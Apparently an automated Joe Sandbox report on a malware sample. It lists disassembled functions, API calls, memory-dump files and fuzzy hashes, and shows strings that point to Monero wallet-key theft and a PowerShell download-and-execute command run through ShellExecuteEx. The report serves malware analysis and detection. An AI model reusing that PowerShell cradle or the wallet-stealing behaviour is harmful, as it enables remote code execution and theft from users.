                                    • lstrcat.KERNEL32(?,00000000), ref: 00C94A51
                                    • lstrcat.KERNEL32(?,?), ref: 00C94A70
                                    • lstrcat.KERNEL32(?,?), ref: 00C94A84
                                    • lstrcat.KERNEL32(?,0151B108), ref: 00C94A97
                                    • lstrcat.KERNEL32(?,?), ref: 00C94AAB
                                    • lstrcat.KERNEL32(?,0152D338), ref: 00C94ABF
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C98F20: GetFileAttributesA.KERNEL32(00000000,?,00C81B94,?,?,00CA577C,?,?,00CA0E22), ref: 00C98F2F
                                      • Part of subcall function 00C947C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C947D0
                                      • Part of subcall function 00C947C0: RtlAllocateHeap.NTDLL(00000000), ref: 00C947D7
                                      • Part of subcall function 00C947C0: wsprintfA.USER32 ref: 00C947F6
                                      • Part of subcall function 00C947C0: FindFirstFileA.KERNEL32(?,?), ref: 00C9480D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: f6f3ea503350cd24b1d7190b59d5c7c420e3faa3ea313e70c251fea9416cea91
                                    • Instruction ID: 916b5e4c4e2788f76cb0a672d8d9f766cc869a05559dc362b72ff796085ecae4
                                    • Opcode Fuzzy Hash: f6f3ea503350cd24b1d7190b59d5c7c420e3faa3ea313e70c251fea9416cea91
                                    • Instruction Fuzzy Hash: 1C316AB290030CABCF14FBA0DC8AEED733CAB59701F444589B31596091EE70A78D9F94
                                    Function 00C92EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C92FD5
                                    Strings
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C92F14
                                    • <, xrefs: 00C92F89
                                    • ')", xrefs: 00C92F03
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C92F54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 9449cc314bd6fd24e54e9aa5df6cc1def7c074890212f8bcb3b03a6842b61f69
                                    • Instruction ID: fbf3c4a3ddef678d90cb8d3ae1624afbf53d331784e24df5bed36d3b36f1dbe2
                                    • Opcode Fuzzy Hash: 9449cc314bd6fd24e54e9aa5df6cc1def7c074890212f8bcb3b03a6842b61f69
                                    • Instruction Fuzzy Hash: 5641F9719102089BDF14EBA0C8AAFEDBB79AF14300F404569E016AB192EF716A49DFD1
                                    Function 00C94300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,0152D3B8,00000000,00020119,?), ref: 00C94344
                                    • RegQueryValueExA.ADVAPI32(?,0152DF80,00000000,00000000,00000000,000000FF), ref: 00C94368
                                    • RegCloseKey.ADVAPI32(?), ref: 00C94372
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C94397
                                    • lstrcat.KERNEL32(?,0152DF08), ref: 00C943AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 56efd82998a8cf14b103b1a55bccdaa05d5e28f9542cfce3e605e83a9d228851
                                    • Instruction ID: 7f5099e4c4cb1c2815dc41aae3373d5e660f882678760e25d842edd44faf2076
                                    • Opcode Fuzzy Hash: 56efd82998a8cf14b103b1a55bccdaa05d5e28f9542cfce3e605e83a9d228851
                                    • Instruction Fuzzy Hash: 134198B690020C6BDF14FBA0EC46FEE737CAB88700F444598B72597181EA7567989BD1
                                    Function 00CFCBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: d18c7d1ba658f31f6ec3a99a06c46e5b2687911f728fb10a39b3d3162d54f94b
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 9421C772F0062DAFDBA19F15CEC1A7F3A79EB81790F054115FA2967211C3304E419BE2
                                    Function 00C97F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C97FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,0151BAF0,00000000,00020119,?), ref: 00C97FEE
                                    • RegQueryValueExA.ADVAPI32(?,0152D2D8,00000000,00000000,000000FF,000000FF), ref: 00C9800F
                                    • RegCloseKey.ADVAPI32(?), ref: 00C98022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: a4b1f38fcdbe4671b61c9570598df6e46e48610017950110f5b5473c58bbb9d3
                                    • Instruction ID: 3c697516f70bfaca7c5a13f962fe76346d2642c0a9c20c1411b6de16a6c107f9
                                    • Opcode Fuzzy Hash: a4b1f38fcdbe4671b61c9570598df6e46e48610017950110f5b5473c58bbb9d3
                                    • Instruction Fuzzy Hash: 971191B1A44309EBDB00DF95ED49F7FBB78EB04B11F104119F716A7280DB7559049BA1
                                    Function 00C993F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(0152DE18,00000000,00000000,?,00C89F71,00000000,0152DE18,00000000), ref: 00C993FC
                                    • lstrcpyn.KERNEL32(00F57580,0152DE18,0152DE18,?,00C89F71,00000000,0152DE18), ref: 00C99420
                                    • lstrlen.KERNEL32(00000000,?,00C89F71,00000000,0152DE18), ref: 00C99437
                                    • wsprintfA.USER32 ref: 00C99457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 9a68999d63318b8b6024eb9cd728215bbc13f847a5c24b7e626526f320a701b1
                                    • Instruction ID: 9d495316d60c182780556cf9b545daa7af224f427b5035fd72e984983ee6e8ff
                                    • Opcode Fuzzy Hash: 9a68999d63318b8b6024eb9cd728215bbc13f847a5c24b7e626526f320a701b1
                                    • Instruction Fuzzy Hash: D901DE7550830CFFCB04EFA8D948EAE7B78EB48345F158248FA099B245D731EA44EB90
                                    Function 00C812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C812B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C812BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C812D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C812F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00C812FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: c70ebfcd7a3114a6e5f020160ce461a36c914db3739f6f2f10df9838ee05255f
                                    • Instruction ID: b78098c680b38f3d5c307839c279eb8038bf8c6f8601ea31e9fe663a6f5e3cc1
                                    • Opcode Fuzzy Hash: c70ebfcd7a3114a6e5f020160ce461a36c914db3739f6f2f10df9838ee05255f
                                    • Instruction Fuzzy Hash: AB01CD79A4430DBBDB14EFE4EC49FAE77BCAB48701F104195FB1597280DA709A009B90
                                    Function 00C9CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 735073a6f28429de5567b50e67ec73e6348b9d9f700e22c025f7b08c106cb2ab
                                    • Instruction ID: d84a38fee1d1f38f6210708b7dbc867c80a74592ffe683742ea66535d6d257a9
                                    • Opcode Fuzzy Hash: 735073a6f28429de5567b50e67ec73e6348b9d9f700e22c025f7b08c106cb2ab
                                    • Instruction Fuzzy Hash: 194104B110079C9FDF218B248DD9FFBBFE8AB45304F1444E8E99A97182E2719B459F60
                                    Function 00C968D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C96903
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C969C6
                                    • ExitProcess.KERNEL32 ref: 00C969F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: b8ac435e32594938ba62374505a6f1fbd44649665fb24d14b6937fcf800075e2
                                    • Instruction ID: ef7b020dec554b036521604f3313dfbaae8549de480a3cd67ead9b5c7f50b881
                                    • Opcode Fuzzy Hash: b8ac435e32594938ba62374505a6f1fbd44649665fb24d14b6937fcf800075e2
                                    • Instruction Fuzzy Hash: 55313CB1901218ABDB14EB90DC9AFDEB778AF58300F404189F305A7191DF706B48DFA9
                                    Function 00C98950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CA0E10,00000000,?), ref: 00C989BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C989C6
                                    • wsprintfA.USER32 ref: 00C989E0
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
